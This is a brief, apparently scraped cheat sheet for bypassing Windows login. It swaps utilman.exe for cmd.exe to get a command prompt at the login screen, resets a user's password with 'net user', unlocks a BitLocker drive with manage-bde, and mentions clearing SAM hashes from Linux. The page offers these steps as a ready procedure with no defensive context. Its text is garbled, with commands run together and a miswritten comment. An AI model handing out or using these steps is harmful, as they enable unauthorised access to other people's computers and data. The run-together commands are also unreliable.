Tricking Windows
C:/windows/System32ren utilman.exe utilman2.exe
cp cmd.exe utilman.exenet user ##This will list all the available users in the current windows
net user <username> <password(new)> ## This will rename the password of the user
๐ Now we can directly login in the system with the new password Just entered.
How to disable Bitlocker using CMD
manage-bde -unlock E: -RecoveryPassword "mypassword"Using Linux to Clear SAM file Hash codes
Last updated